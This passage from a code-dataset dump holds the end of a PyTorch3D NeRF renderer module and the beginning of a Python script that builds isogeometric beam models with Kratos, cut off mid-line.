max_depth=max_depth,\n stratified=stratified,\n stratified_test=stratified_test,\n n_rays_per_image=n_rays_per_image,\n image_height=image_height,\n image_width=image_width,\n )\n elif render_pass == \"fine\":\n # Initialize the fine raysampler.\n raysampler = ProbabilisticRaysampler(\n n_pts_per_ray=n_pts_per_ray_fine,\n stratified=stratified,\n stratified_test=stratified_test,\n )\n else:\n raise ValueError(f\"No such rendering pass {render_pass}\")\n\n # Initialize the fine/coarse renderer.\n self._renderer[render_pass] = ImplicitRenderer(\n raysampler=raysampler,\n raymarcher=raymarcher,\n )\n\n # Instantiate the fine/coarse NeuralRadianceField module.\n self._implicit_function[render_pass] = NeuralRadianceField(\n n_harmonic_functions_xyz=n_harmonic_functions_xyz,\n n_harmonic_functions_dir=n_harmonic_functions_dir,\n n_hidden_neurons_xyz=n_hidden_neurons_xyz,\n n_hidden_neurons_dir=n_hidden_neurons_dir,\n n_layers_xyz=n_layers_xyz,\n append_xyz=append_xyz,\n )\n\n self._density_noise_std = density_noise_std\n self._chunk_size_test = chunk_size_test\n self._image_size = image_size\n self.visualization = visualization\n\n def precache_rays(\n self,\n cache_cameras: List[CamerasBase],\n cache_camera_hashes: List[str],\n ):\n \"\"\"\n Precaches the rays emitted from the list of cameras `cache_cameras`,\n where each camera is uniquely identified with the corresponding hash\n from `cache_camera_hashes`.\n\n The cached rays are moved to cpu and stored in\n `self._renderer['coarse']._ray_cache`.\n\n Raises `ValueError` when caching two cameras with the same hash.\n\n Args:\n cache_cameras: A list of `N` cameras for which the rays are pre-cached.\n cache_camera_hashes: A list of `N` unique identifiers for each\n camera from `cameras`.\n \"\"\"\n self._renderer[\"coarse\"].raysampler.precache_rays(\n cache_cameras,\n cache_camera_hashes,\n )\n\n def _process_ray_chunk(\n self,\n camera_hash: Optional[str],\n camera: CamerasBase,\n image: torch.Tensor,\n chunk_idx: int,\n ) -> dict:\n \"\"\"\n Samples and renders a chunk of rays.\n\n Args:\n camera_hash: A unique identifier of a pre-cached camera.\n If `None`, the cache is not searched and the sampled rays are\n calculated from scratch.\n camera: A batch of cameras from which the scene is rendered.\n image: A batch of corresponding ground truth images of shape\n ('batch_size', ·, ·, 3).\n chunk_idx: The index of the currently rendered ray chunk.\n Returns:\n out: `dict` containing the outputs of the rendering:\n `rgb_coarse`: The result of the coarse rendering pass.\n `rgb_fine`: The result of the fine rendering pass.\n `rgb_gt`: The corresponding ground-truth RGB values.\n \"\"\"\n # Initialize the outputs of the coarse rendering to None.\n coarse_ray_bundle = None\n coarse_weights = None\n\n # First evaluate the coarse rendering pass, then the fine one.\n for renderer_pass in (\"coarse\", \"fine\"):\n (rgb, weights), ray_bundle_out = self._renderer[renderer_pass](\n cameras=camera,\n volumetric_function=self._implicit_function[renderer_pass],\n chunksize=self._chunk_size_test,\n chunk_idx=chunk_idx,\n density_noise_std=(self._density_noise_std if self.training else 0.0),\n input_ray_bundle=coarse_ray_bundle,\n ray_weights=coarse_weights,\n camera_hash=camera_hash,\n )\n\n if renderer_pass == \"coarse\":\n rgb_coarse = rgb\n # Store the weights and the rays of the first rendering pass\n # for the ensuing importance ray-sampling of the fine render.\n coarse_ray_bundle = ray_bundle_out\n coarse_weights = weights\n if image is not None:\n # Sample the ground truth images at the xy locations of the\n # rendering ray pixels.\n rgb_gt = sample_images_at_mc_locs(\n image[..., :3][None],\n ray_bundle_out.xys,\n )\n else:\n rgb_gt = None\n\n elif renderer_pass == \"fine\":\n rgb_fine = rgb\n\n else:\n raise ValueError(f\"No such rendering pass {renderer_pass}\")\n\n out = {\"rgb_fine\": rgb_fine, \"rgb_coarse\": rgb_coarse, \"rgb_gt\": rgb_gt}\n if self.visualization:\n # Store the coarse rays/weights only for visualization purposes.\n out[\"coarse_ray_bundle\"] = type(coarse_ray_bundle)(\n *[v.detach().cpu() for k, v in coarse_ray_bundle._asdict().items()]\n )\n out[\"coarse_weights\"] = coarse_weights.detach().cpu()\n\n return out\n\n def forward(\n self,\n camera_hash: Optional[str],\n camera: CamerasBase,\n image: torch.Tensor,\n ) -> Tuple[dict, dict]:\n \"\"\"\n Performs the coarse and fine rendering passes of the radiance field\n from the viewpoint of the input `camera`.\n Afterwards, both renders are compared to the input ground truth `image`\n by evaluating the peak signal-to-noise ratio and the mean-squared error.\n\n The rendering result depends on the `self.training` flag:\n - In the training mode (`self.training==True`), the function renders\n a random subset of image rays (Monte Carlo rendering).\n - In evaluation mode (`self.training==False`), the function renders\n the full image. In order to prevent out-of-memory errors,\n when `self.training==False`, the rays are sampled and rendered\n in batches of size `chunksize`.\n\n Args:\n camera_hash: A unique identifier of a pre-cached camera.\n If `None`, the cache is not searched and the sampled rays are\n calculated from scratch.\n camera: A batch of cameras from which the scene is rendered.\n image: A batch of corresponding ground truth images of shape\n ('batch_size', ·, ·, 3).\n Returns:\n out: `dict` containing the outputs of the rendering:\n `rgb_coarse`: The result of the coarse rendering pass.\n `rgb_fine`: The result of the fine rendering pass.\n `rgb_gt`: The corresponding ground-truth RGB values.\n\n The shape of `rgb_coarse`, `rgb_fine`, `rgb_gt` depends on the\n `self.training` flag:\n If `==True`, all 3 tensors are of shape\n `(batch_size, n_rays_per_image, 3)` and contain the result\n of the Monte Carlo training rendering pass.\n If `==False`, all 3 tensors are of shape\n `(batch_size, image_size[0], image_size[1], 3)` and contain\n the result of the full image rendering pass.\n metrics: `dict` containing the error metrics comparing the fine and\n coarse renders to the ground truth:\n `mse_coarse`: Mean-squared error between the coarse render and\n the input `image`\n `mse_fine`: Mean-squared error between the fine render and\n the input `image`\n `psnr_coarse`: Peak signal-to-noise ratio between the coarse render and\n the input `image`\n `psnr_fine`: Peak signal-to-noise ratio between the fine render and\n the input `image`\n \"\"\"\n if not self.training:\n # Full evaluation pass.\n n_chunks = self._renderer[\"coarse\"].raysampler.get_n_chunks(\n self._chunk_size_test,\n camera.R.shape[0],\n )\n else:\n # MonteCarlo ray sampling.\n n_chunks = 1\n\n # Process the chunks of rays.\n chunk_outputs = [\n self._process_ray_chunk(\n camera_hash,\n camera,\n image,\n chunk_idx,\n )\n for chunk_idx in range(n_chunks)\n ]\n\n if not self.training:\n # For a full render pass concatenate the output chunks,\n # and reshape to image size.\n out = {\n k: torch.cat(\n [ch_o[k] for ch_o in chunk_outputs],\n dim=1,\n ).view(-1, *self._image_size, 3)\n if chunk_outputs[0][k] is not None\n else None\n for k in (\"rgb_fine\", \"rgb_coarse\", \"rgb_gt\")\n }\n else:\n out = chunk_outputs[0]\n\n # Calc the error metrics.\n metrics = {}\n if image is not None:\n for render_pass in (\"coarse\", \"fine\"):\n for metric_name, metric_fun in zip(\n (\"mse\", \"psnr\"), (calc_mse, calc_psnr)\n ):\n metrics[f\"{metric_name}_{render_pass}\"] = metric_fun(\n out[\"rgb_\" + render_pass][..., :3],\n out[\"rgb_gt\"][..., :3],\n )\n\n return out, metrics\n\n\ndef visualize_nerf_outputs(\n nerf_out: dict, output_cache: List, viz: Visdom, visdom_env: str\n):\n \"\"\"\n Visualizes the outputs of the `RadianceFieldRenderer`.\n\n Args:\n nerf_out: An output of the validation rendering pass.\n output_cache: A list with outputs of several training render passes.\n viz: A visdom connection object.\n visdom_env: The name of visdom environment for visualization.\n \"\"\"\n\n # Show the training images.\n ims = torch.stack([o[\"image\"] for o in output_cache])\n ims = torch.cat(list(ims), dim=1)\n viz.image(\n ims.permute(2, 0, 1),\n env=visdom_env,\n win=\"images\",\n opts={\"title\": \"train_images\"},\n )\n\n # Show the coarse and fine renders together with the ground truth images.\n ims_full = torch.cat(\n [\n nerf_out[imvar][0].permute(2, 0, 1).detach().cpu().clamp(0.0, 1.0)\n for imvar in (\"rgb_coarse\", \"rgb_fine\", \"rgb_gt\")\n ],\n dim=2,\n )\n viz.image(\n ims_full,\n env=visdom_env,\n win=\"images_full\",\n opts={\"title\": \"coarse | fine | target\"},\n )\n\n # Make a 3D plot of training cameras and their emitted rays.\n camera_trace = {\n f\"camera_{ci:03d}\": o[\"camera\"].cpu() for ci, o in enumerate(output_cache)\n }\n ray_pts_trace = {\n f\"ray_pts_{ci:03d}\": Pointclouds(\n ray_bundle_to_ray_points(o[\"coarse_ray_bundle\"])\n .detach()\n .cpu()\n .view(1, -1, 3)\n )\n for ci, o in enumerate(output_cache)\n }\n plotly_plot = plot_scene(\n {\n \"training_scene\": {\n **camera_trace,\n **ray_pts_trace,\n },\n },\n pointcloud_max_points=5000,\n pointcloud_marker_size=1,\n camera_scale=0.3,\n )\n viz.plotlyplot(plotly_plot, env=visdom_env, win=\"scenes\")","repo_name":"wesbz/pytorch3d-nerf","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":50749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17451698191","text":"from KratosMultiphysics import *\nfrom KratosMultiphysics.IgaApplication import *\nfrom KratosMultiphysics.StructuralMechanicsApplication import *\nimport new_linear_solver_factory\nimport ANurbsDev as an\nimport numpy as np\nfrom scipy import integrate\nimport yaml\nimport json\nimport pandas as pd\n\n\ndef normalized(v):\n return v / np.linalg.norm(v)\n\ndef normalized_1(v, v_1):\n return v_1 / np.linalg.norm(v) - np.dot(v, v_1) * v / np.linalg.norm(v)**3\n\ndef cross_1(u, u_1, v, v_1):\n return np.cross(u, v_1) + np.cross(u_1, v)\n\ndef cross_v_identity(v):\n return np.array([[0.0, -v[2], v[1]], [v[2], 0.0, -v[0]], [-v[1], v[0], 0.0]])\n\ndef compute_rod(v, phi):\n return np.cos(phi) * np.eye(3) + cross_v_identity(np.sin(phi) * v)\n\ndef compute_rod_1(v, v_1, phi, phi_1):\n return np.cos(phi) * phi_1 * cross_v_identity(v) + np.sin(phi) * (cross_v_identity(v_1) - phi_1 * np.eye(3))\n\ndef compute_lam(v1, v2):\n v1_x_v2 = np.cross(v1, v2)\n v1_d_v2 = np.dot(v1, v2)\n\n lam = v1_d_v2 * np.eye(3) + cross_v_identity(v1_x_v2)\n\n if v1_d_v2 + 1.0 > 1e-7:\n lam = lam + np.outer(v1_x_v2, v1_x_v2) * 1.0 / (1.0 + v1_d_v2)\n else:\n l_v1_x_v2 = np.linalg.norm(v1_x_v2)\n\n e_hat = v1_x_v2\n\n if l_v1_x_v2 > 1e-7:\n e_hat = e_hat / l_v1_x_v2\n lam = lam + np.outer(e_hat, e_hat) * (1 - v1_d_v2)\n\n return lam\n\ndef compute_lam_1(v1, v1_1, v2, v2_1):\n T0_T = np.dot(v1, v2)\n T0_T_1 = np.dot(v1, v2_1) + np.dot(v1_1, v2)\n T0xT = np.cross(v1, v2)\n T0xT_1 = np.cross(v1, v2_1) + np.cross(v1_1, v2)\n\n d = 1.0 / (1.0 + T0_T)\n\n o = np.outer(T0xT_1, T0xT) + np.outer(T0xT, T0xT_1)\n\n return T0_T_1 * np.eye(3) + cross_v_identity(T0xT_1) - T0_T_1 * np.power(d, 2) * np.outer(T0xT, T0xT) + d * o\n\n\nclass Model:\n def __init__(self, geometry):\n # modell erzeugen\n model_part = ModelPart('Model')\n\n # variablen definieren die jeder knoten speichern soll\n model_part.AddNodalSolutionStepVariable(DISPLACEMENT)\n model_part.AddNodalSolutionStepVariable(DISPLACEMENT_ROTATION)\n model_part.AddNodalSolutionStepVariable(REACTION)\n model_part.AddNodalSolutionStepVariable(REACTION_ROTATION)\n model_part.AddNodalSolutionStepVariable(POINT_LOAD)\n\n self.model_part = model_part\n\n self.nodes = []\n self._node_keys = {}\n\n self.beams = []\n self._beam_keys = {}\n\n self.properties = []\n self._property_keys = {}\n\n self.elements = []\n self._element_keys = {}\n\n self._time_step = 0\n\n self.geometry = geometry\n\n self.penalty = []\n self.penalty_key = {}\n\n self.update_conditions = []\n\n def add_node(self, key, location):\n node_id = len(self.nodes) + 1\n node = self.model_part.CreateNewNode(node_id, *location)\n node.AddDof(DISPLACEMENT_X, REACTION_X)\n node.AddDof(DISPLACEMENT_Y, REACTION_Y)\n node.AddDof(DISPLACEMENT_Z, REACTION_Z)\n node.AddDof(DISPLACEMENT_ROTATION, REACTION_ROTATION)\n self.nodes.append(node)\n self._node_keys[key] = node\n return node\n\n def node(self, key):\n return self._node_keys[key]\n\n def add_beam(self, curve_geometry_ptr):\n beam = Beam(self, curve_geometry_ptr)\n self.beams.append(beam)\n self._beam_keys[beam.key] = beam\n\n def beam(self, key):\n return self._beam_keys[f'{key}.CurveGeometry3D']\n\n def add_properties(self, key=None):\n property_id = len(self.properties) + 1\n\n property = self.model_part.GetProperties()[property_id]\n\n self.properties.append(property)\n\n if key is not None:\n self._property_keys[key] = property\n\n def add_beam_properties(self, key, area, it, iy, iz, youngs_modulus, shear_modulus):\n property_id = len(self.properties) + 1\n\n property = self.model_part.GetProperties()[property_id]\n property.SetValue(CROSS_AREA, area) # m²\n property.SetValue(MOMENT_OF_INERTIA_T, it) # m4\n property.SetValue(MOMENT_OF_INERTIA_Y, iy) # m4\n property.SetValue(MOMENT_OF_INERTIA_Z, iz) # m4\n property.SetValue(YOUNG_MODULUS, youngs_modulus) # kN/m²\n property.SetValue(SHEAR_MODULUS, shear_modulus) # kN/m²\n\n self.properties.append(property)\n self._property_keys[key] = property\n\n def property(self, key):\n return self._property_keys[key]\n\n def add_element(self, element_type, nodes, property):\n element_id = len(self.elements) + 1\n node_ids = [node.Id for node in nodes]\n element = self.model_part.CreateNewElement(element_type, element_id, node_ids, property)\n self.elements.append(element)\n self._element_keys[element_id] = element\n return element\n\n def add_condition(self, condition_type, nodes, property):\n element_id = len(self.elements) + 1\n node_ids = [node.Id for node in nodes]\n element = self.model_part.CreateNewCondition(condition_type, element_id, node_ids, property)\n self.elements.append(element)\n self._element_keys[element_id] = element\n return element\n\n def init_solver(self):\n # Löser konfigurieren\n self.model_part.SetBufferSize(1)\n\n # Verfahren\n time_scheme = ResidualBasedIncrementalUpdateStaticScheme()\n\n linear_solver = new_linear_solver_factory.ConstructSolver(Parameters(\n r'{\"solver_type\": \"eigen_sparse_lu\"}'))\n\n # Abbruchkriterium\n relative_tolerance = 1e-09\n absolute_tolerance = 1e-09\n # conv_criteria = ResidualCriteria(relative_tolerance, absolute_tolerance)\n conv_criteria = DisplacementCriteria(relative_tolerance, absolute_tolerance)\n conv_criteria.SetEchoLevel(1)\n\n # Löser\n maximum_iterations = 600 #!! Wenn der Löser nur eine Iteration durchführt erhälst du eine lineare Lösung > Iterationszahl erhöhen!\n compute_reactions = True\n reform_dofs_at_each_iteration = True\n move_mesh_flag = True\n\n self.solver = ResidualBasedNewtonRaphsonStrategy(\n self.model_part,\n time_scheme,\n linear_solver,\n conv_criteria,\n maximum_iterations,\n compute_reactions,\n reform_dofs_at_each_iteration,\n move_mesh_flag\n )\n self.solver.SetEchoLevel(1)\n\n def solve(self, lam=1.0):\n self._time_step += 1\n\n self.model_part.CloneTimeStep(self._time_step)\n\n for update_condition in self.update_conditions:\n update_condition(lam)\n\n self.solver.Solve()\n\n self.update()\n\n def update(self):\n for beam in self.beams:\n beam.update(self._time_step)\n\nclass Beam:\n def __init__(self, model, curve_geometry_ptr):\n\n self.clear_memory()\n\n curve_geometry = curve_geometry_ptr.Data()\n\n nodes = []\n\n for i, pole in enumerate(curve_geometry.Poles()):\n node_key = (curve_geometry_ptr.Key(), i)\n\n node = model.add_node(node_key, location=pole)\n\n nodes.append(node)\n\n self.model = model\n self.curve_geometry_ptr = curve_geometry_ptr\n self.curve_geometry = curve_geometry\n self.nodes = nodes\n\n @property\n def key(self):\n return self.curve_geometry_ptr.Key()\n\n @property\n def model_part(self):\n return self.model.model_part\n\n @property\n def t0(self):\n return self.curve_geometry.Domain().T0()\n\n def fix_node(self, index, directions):\n node = self.nodes[index]\n\n if 'x' in directions:\n node.Fix(DISPLACEMENT_X)\n if 'y' in directions:\n node.Fix(DISPLACEMENT_Y)\n if 'z' in directions:\n node.Fix(DISPLACEMENT_Z)\n if 'rotation' in directions:\n node.Fix(DISPLACEMENT_ROTATION)\n\n def add_node_load(self, index, load=[0,0,0]):\n node = self.nodes[index]\n\n load_properties = self.model.add_properties()\n\n self.model.add_condition('PointLoadCondition3D1N', [node], load_properties)\n\n node.SetSolutionStepValue(POINT_LOAD_X, load[0])\n node.SetSolutionStepValue(POINT_LOAD_Y, load[1])\n node.SetSolutionStepValue(POINT_LOAD_Z, load[2])\n\n def add_node_load_moment(self, t, force=[0,0,0], moment=[0,0,0]):\n\n curve_geometry = self.curve_geometry\n model_part = self.model_part\n\n integration_degree = curve_geometry.Degree() + 1\n\n curve_geometry = self.curve_geometry\n\n nonzero_node_indices, shape_functions = curve_geometry.ShapeFunctionsAt(t, order=3)\n\n nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n load_properties = self.model.add_properties()\n\n condition = self.model.add_condition('IgaBeamLoadCondition', nonzero_nodes, load_properties)\n\n condition.SetValue(SHAPE_FUNCTION_VALUES , shape_functions[0])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions[1])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions[2])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions[3])\n\n p, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n condition.SetValue(BASE_A1, A1.tolist())\n condition.SetValue(BASE_A2, A2.tolist())\n condition.SetValue(BASE_A3, A3.tolist())\n condition.SetValue(BASE_A1_1, A1_1.tolist())\n condition.SetValue(BASE_A2_1, A2_1.tolist())\n condition.SetValue(BASE_A3_1, A3_1.tolist())\n\n condition.SetValue(LOAD_VECTOR_FORCE, force)\n condition.SetValue(LOAD_VECTOR_MOMENT, moment)\n\n def update_condition(lam):\n condition.SetValue(LOAD_VECTOR_FORCE, (np.array(force) * lam).tolist())\n condition.SetValue(LOAD_VECTOR_MOMENT, (np.array(moment) * lam).tolist())\n\n self.model.update_conditions.append(update_condition)\n\n def set_node_load(self, index, load):\n node = self.nodes[index]\n\n node.SetSolutionStepValue(POINT_LOAD_X, load[0])\n node.SetSolutionStepValue(POINT_LOAD_Y, load[1])\n node.SetSolutionStepValue(POINT_LOAD_Z, load[2])\n\n #Print load vector\n geometry = self.model.geometry\n\n scale = 0.2\n if np.amax(np.absolute(load)) != 0:\n scale = np.amax(np.absolute(load))\n\n load_0 = [node.X, node.Y, node.Z]\n load_vec = [node.X - load[0]//scale, node.Y - load[1]/scale, node.Z - load[2]/scale]\n\n line_ptr = geometry.Add(an.Line3D(a=load_vec, b=load_0))\n line_ptr.Attributes().SetLayer(f'LoadVector')\n line_ptr.Attributes().SetColor(f'#ff0000')\n line_ptr.Attributes().SetArrowhead('End')\n\n\n\n def set_node_value(self, index, directions, value=0):\n node = self.nodes[index]\n\n if 'x' in directions:\n node.SetSolutionStepValue(DISPLACEMENT_X, value)\n if 'y' in directions:\n node.SetSolutionStepValue(DISPLACEMENT_Y, value)\n if 'z' in directions:\n node.SetSolutionStepValue(DISPLACEMENT_Z, value)\n if 'rotation' in directions:\n node.SetSolutionStepValue(DISPLACEMENT_ROTATION, value)\n # node.SetValue(DISPLACEMENT_ROTATION, value)\n\n # node.SetSolutionStepValue(str(key), 0, value)\n # node.SetSolutionStepValue(DISPLACEMENT_ROTATION, 0, value)\n\n def _func(self, t):\n curve_geometry = self.curve_geometry\n _, r_1, r_2, r_3 = curve_geometry.DerivativesAt(t = t , order = 3)\n a = np.cross(r_1, r_2)\n d = np.dot(a, r_3)\n delta = np.linalg.norm(r_1)\n alpha = np.linalg.norm(a)\n tau = 0\n if alpha >= 1e-13:\n tau = d / alpha**2\n return -tau * delta\n\n def frame_at(self, t):\n curve_geometry = self.curve_geometry\n p, r_1, r_2, r_3 = curve_geometry.DerivativesAt(t = t, order = 3)\n\n tol = 1e-12\n a = np.cross(r_1,r_2)\n a_1 = cross_1(r_1, r_2, r_2, r_3)\n d = np.dot(a, r_3)\n delta = np.linalg.norm(r_1)\n alpha = np.linalg.norm(a)\n if alpha >= tol:\n kappa = alpha / delta**3\n tau = d / alpha**2\n\n T = r_1 / delta \n B = a / alpha \n N = np.cross(B, T) \n\n T_1 = normalized_1(r_1, r_2)\n B_1 = normalized_1(a, a_1)\n N_1 = cross_1(B, B_1, T, T_1)\n\n theta = integrate.romberg(self._func, 0 , t, divmax=12)\n theta_1 = tau * delta\n\n a1 = r_1\n a1_1 = r_2\n\n a3 = -( N * np.cos(theta) + B * np.sin(theta))\n a3_1 = -( ( + N_1 * np.cos(theta) - N * np.sin(theta) * theta_1\n + B_1 * np.sin(theta) + B * np.cos(theta) * theta_1))\n\n a2 = -( -N * np.sin(theta) + B * np.cos(theta))\n a2_1 = -( - N_1 * np.sin(theta) - N * np.cos(theta) * theta_1\n + B_1 * np.cos(theta) - B * np.sin(theta) * theta_1)\n pass\n else: # Fall: Gerader Stab:: Krümmung = inf\n T = r_1 / delta\n a1 = r_1\n a1_1 = r_2\n # if np.array_equal(T,[0,0,1]):\n if T[2] == 1:\n a2 = np.array([0,1,0])\n else:\n a2 = normalized([-r_1[1] , r_1[0] , 0])\n\n a3 = np.cross(T,a2)\n\n a2_1 = np.array([0,0,0])\n a3_1 = np.array([0,0,0])\n\n # print('a1 ', a1)\n # print('a2 ', a2)\n # print('a3 ', a3)\n # print('a1_1 ', a1_1)\n # print('a2_1 ', a2_1)\n # print('a3_1 ', a3_1)\n return p, a1, a1_1, a2, a2_1, a3, a3_1\n\n def add_moment(self, t, vector, material):\n if not isinstance(property, Properties):\n material = self.model.property(material)\n\n curve_geometry = self.curve_geometry\n # model_part = self.model_part\n\n # integration_degree = curve_geometry.Degree() + 1\n\n nonzero_node_indices, shape_functions = curve_geometry.ShapeFunctionsAt(t, order=3)\n\n nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n condition = self.model.add_element('IgaBeamMomentCondition', nonzero_nodes, material)\n\n condition.SetValue(INTEGRATION_WEIGHT, 1) # FIXME: integration_weight von der Kratoskurve beziehen.\n\n condition.SetValue(SHAPE_FUNCTION_VALUES , shape_functions[0])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions[1])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions[2])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions[3])\n\n _, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n condition.SetValue(BASE_A1, A1.tolist())\n condition.SetValue(BASE_A2, A2.tolist())\n condition.SetValue(BASE_A3, A3.tolist())\n condition.SetValue(BASE_A1_1, A1_1.tolist())\n condition.SetValue(BASE_A2_1, A2_1.tolist())\n condition.SetValue(BASE_A3_1, A3_1.tolist())\n\n condition.SetValue(LOAD_VECTOR_MOMENT, vector)\n\n\n def add_support(self, t, penalty):\n\n geometry = self.model.geometry\n\n\n material = self.model.add_beam_properties('dummy_material',\n area = 0, it = 0, iy = 0, iz = 0,\n youngs_modulus = 0, shear_modulus = 0,\n )\n\n curve_geometry = self.curve_geometry\n model_part = self.model_part\n\n integration_degree = curve_geometry.Degree() + 1\n\n curve_geometry = self.curve_geometry\n\n nonzero_node_indices, shape_functions = curve_geometry.ShapeFunctionsAt(t, order=3)\n\n nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n condition = self.model.add_element('IgaBeamWeakBeddingCondition', nonzero_nodes, material)\n\n condition.SetValue(SHAPE_FUNCTION_VALUES , shape_functions[0])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions[1])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions[2])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions[3])\n\n p, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n condition.SetValue(BASE_A1, A1.tolist())\n condition.SetValue(BASE_A2, A2.tolist())\n condition.SetValue(BASE_A3, A3.tolist())\n condition.SetValue(BASE_A1_1, A1_1.tolist())\n condition.SetValue(BASE_A2_1, A2_1.tolist())\n condition.SetValue(BASE_A3_1, A3_1.tolist())\n\n DISPLACEMENT_X = 0 # default\n DISPLACEMENT_Y = 0 # default\n DISPLACEMENT_Z = 0 # default\n TORSION = 0 # default\n ROTATION = 0 # default\n\n bool_support_x = False\n bool_support_y = False\n bool_support_z = False\n\n if 'displacement_x' in penalty:\n DISPLACEMENT_X = penalty[\"displacement_x\"]\n if DISPLACEMENT_X != 0: bool_support_x = True\n if 'disp_x' in penalty:\n DISPLACEMENT_X = penalty[\"disp_x\"]\n if DISPLACEMENT_X != 0: bool_support_x = True\n if 'displacement_y' in penalty:\n DISPLACEMENT_Y = penalty[\"displacement_y\"]\n if DISPLACEMENT_Y != 0: bool_support_y = True\n if 'disp_y' in penalty:\n DISPLACEMENT_Y = penalty[\"disp_y\"]\n if DISPLACEMENT_Y != 0: bool_support_y = True\n if 'displacement_z' in penalty:\n DISPLACEMENT_Z = penalty[\"displacement_z\"]\n if DISPLACEMENT_Z != 0: bool_support_z = True\n if 'disp_z' in penalty:\n DISPLACEMENT_Z = penalty[\"disp_z\"]\n if DISPLACEMENT_Z != 0: bool_support_z = True\n if 'torsion' in penalty:\n TORSION = penalty[\"torsion\"]\n if 'tors' in penalty:\n TORSION = penalty[\"tors\"]\n if 'rotation_2' in penalty:\n ROTATION_2 = penalty[\"rotation_2\"]\n if 'rot_2' in penalty:\n ROTATION_2 = penalty[\"rot_2\"]\n if 'rotation_3' in penalty:\n ROTATION_3 = penalty[\"rotation_3\"]\n if 'rot_3' in penalty:\n ROTATION_3 = penalty[\"rot_3\"]\n\n condition.SetValue(PENALTY_DISPLACEMENT_X, DISPLACEMENT_X)\n condition.SetValue(PENALTY_DISPLACEMENT_Y, DISPLACEMENT_Y)\n condition.SetValue(PENALTY_DISPLACEMENT_Z, DISPLACEMENT_Z)\n condition.SetValue(PENALTY_TORSION, TORSION)\n condition.SetValue(PENALTY_ROTATION_2, ROTATION_2)\n condition.SetValue(PENALTY_ROTATION_3, ROTATION_3)\n\n if bool_support_x:\n line_ptr = geometry.Add(an.Line3D(a=np.add(p,np.array([0.01,0,0])), b=p))\n line_ptr.Attributes().SetLayer(f'Support')\n line_ptr.Attributes().SetColor(f'#00ff00')\n line_ptr.Attributes().SetArrowhead('End')\n\n if bool_support_y:\n line_ptr = geometry.Add(an.Line3D(a=np.add(p,np.array([0,0.01,0])), b=p))\n line_ptr.Attributes().SetLayer(f'Support')\n line_ptr.Attributes().SetColor(f'#00ff00')\n line_ptr.Attributes().SetArrowhead('End')\n\n if bool_support_z:\n line_ptr = geometry.Add(an.Line3D(a=np.add(p,np.array([0,0,0.01])), b=p))\n line_ptr.Attributes().SetLayer(f'Support')\n line_ptr.Attributes().SetColor(f'#00ff00')\n line_ptr.Attributes().SetArrowhead('End')\n\n return condition\n\n def add_stiffness(self, material):\n if not isinstance(property, Properties):\n material = self.model.property(material)\n\n curve_geometry = self.curve_geometry\n # model_part = self.model_part\n\n integration_points = []\n\n integration_degree = curve_geometry.Degree() + 1\n\n for span in curve_geometry.Spans():\n if span.Length() < 1e-7:\n continue\n\n integration_points += an.IntegrationPoints.Points1D(\n degree=integration_degree,\n domain=span,\n )\n\n for i, (t, weight) in enumerate(integration_points):\n nonzero_node_indices, shape_functions = curve_geometry.ShapeFunctionsAt(t, order=3)\n\n nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n element = self.model.add_element('IgaBeamADElement', nonzero_nodes, material)\n\n element.SetValue(INTEGRATION_WEIGHT, weight)\n\n element.SetValue(SHAPE_FUNCTION_VALUES , shape_functions[0])\n element.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions[1])\n element.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions[2])\n element.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions[3])\n\n p, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n element.SetValue(BASE_A1, A1.tolist())\n element.SetValue(BASE_A2, A2.tolist())\n element.SetValue(BASE_A3, A3.tolist())\n element.SetValue(BASE_A1_1, A1_1.tolist())\n element.SetValue(BASE_A2_1, A2_1.tolist())\n element.SetValue(BASE_A3_1, A3_1.tolist())\n\n element.SetValue(GAUSS_POINT, list(p))\n\n frame = open('frames.txt', 'a')\n frame.write( str(p.tolist()) + str(A1.tolist()) + str(A2.tolist()) + str(A3.tolist()) + '\\n')\n frame.close()\n\n def evaluate_point(self, t, material):\n if not isinstance(property, Properties):\n material = self.model.property(material)\n\n geometry = self.model.geometry\n\n curve_geometry = self.curve_geometry\n model_part = self.model_part\n\n integration_degree = curve_geometry.Degree() + 1\n\n curve_geometry = self.curve_geometry\n\n nonzero_node_indices, shape_functions = curve_geometry.ShapeFunctionsAt(t, order=3)\n\n nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n # condition = self.model.add_element('IgaBeamWeakBeddingCondition', nonzero_nodes, material)\n element = self.model.add_element('IgaBeamADPostprocess', nonzero_nodes, material)\n\n\n element.SetValue(SHAPE_FUNCTION_VALUES , shape_functions[0])\n element.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions[1])\n element.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions[2])\n element.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions[3])\n\n p, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n element.SetValue(BASE_A1, A1.tolist())\n element.SetValue(BASE_A2, A2.tolist())\n element.SetValue(BASE_A3, A3.tolist())\n element.SetValue(BASE_A1_1, A1_1.tolist())\n element.SetValue(BASE_A2_1, A2_1.tolist())\n element.SetValue(BASE_A3_1, A3_1.tolist())\n\n # nonzero_node_indices, shape_functions = 